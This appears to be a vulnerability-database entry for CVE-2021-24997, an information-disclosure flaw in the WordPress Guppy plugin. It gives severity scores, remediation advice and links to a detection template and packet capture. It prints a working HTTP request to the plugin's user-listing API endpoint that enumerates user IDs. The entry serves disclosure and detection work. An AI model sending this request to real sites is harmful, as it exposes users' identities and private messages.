🔙 목록으로 돌아가기

CVE-2021-24997: WordPress Guppy <=1.1 - Information Disclosure

TitleWordPress Guppy <=1.1 - Information Disclosure
AuthorEvan Rubinstein
SeverityMedium
ImpactAn attacker can exploit this vulnerability to gain sensitive information from the target system.
RemediationUpdate to the latest version of the WordPress Guppy plugin (version >1.1) to mitigate the information disclosure vulnerability.
CVSS Score6.5
EPSS Score0.04579
CVE IDCVE-2021-24997
CWE IDCWE-862
Tags cve cve2021 wordpress guppy api wp-plugin edb wpscan wp-guppy vuln

🔍 Vulnerability Description

WordPress Guppy plugin through 1.1 is susceptible to an API disclosure vulnerability. This can allow an attacker to obtain all user IDs and then use them to make API requests to get messages sent between users and/or send messages posing as one user to another.

🌐 HTTP Request

GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24997.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24997.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A